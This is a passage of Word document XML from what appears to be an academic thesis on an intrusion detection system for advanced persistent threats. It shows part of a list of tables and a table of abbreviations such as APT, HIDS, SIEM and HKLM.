          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303803 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</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804" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="006F570A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 4.1 dwFilter values and their meanings</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303804 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>66</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805" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="006F570A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 4.2 Manual tests performed and their result</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303805 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>92</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc485303806" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="006F570A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 4.3 Malware samples used for experiments and test results.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303806 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>99</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C44A6F" w:rsidRDefault="00C44A6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003802AB" w:rsidRDefault="003725C1" w:rsidP="003725C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00600BA7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TABLE OF ABBREVIATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877325" w:rsidRDefault="003725C1" w:rsidP="003725C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00600BA7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4390"/>
        <w:gridCol w:w="4390"/>
      </w:tblGrid>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00F85F5E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00F85F5E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F85F5E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Abbreviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00F85F5E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F85F5E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Expansion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>APC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Asynchronous Procedure Calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Advanced Persistent Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>APTIDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Advanced Persistent Threat Inspection Detection System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Command Line Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>FIM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>File Integrity Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>GUI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Graphical User Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HIDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Host-based Intrusion Detection System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D26C9E">
              <w:t>IDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D26C9E">
              <w:t>Intrusion Detection System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>LAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Local Area Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>RPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Remote Procedure Call</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>RPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Remote Procedure Calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>SCM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Service Control Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>SCM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Service Control Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Security Information and Event Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21216" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21216" w:rsidRDefault="00C21216" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>DHCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21216" w:rsidRDefault="00C21216" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Dynamic Host Configuration Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21216" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21216" w:rsidRDefault="00C21216" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>DLCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21216" w:rsidRDefault="00C21216" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Distributed Log Collector Hardware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A23FC" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008A23FC" w:rsidRDefault="008A23FC" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>CLSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008A23FC" w:rsidRDefault="008A23FC" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Centralize Log Storage System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94D16" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B94D16" w:rsidRDefault="00B94D16" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HKLM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B94D16" w:rsidRDefault="00B94D16" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>HKEY_LOCAL_MACHINE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94D16" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B94D16" w:rsidRDefault="00B94D16" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HKCU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B94D16" w:rsidRDefault="00B94D16" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>HKEY_CURRENT_USER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D26C9E" w:rsidRPr="00600BA7" w:rsidRDefault="00D26C9E" w:rsidP="00D26C9E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D26C9E" w:rsidRDefault="00D26C9E" w:rsidP="00D26C9E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D26C9E" w:rsidRDefault="00D26C9E" w:rsidP="00D26C9E">
      <w:pPr>
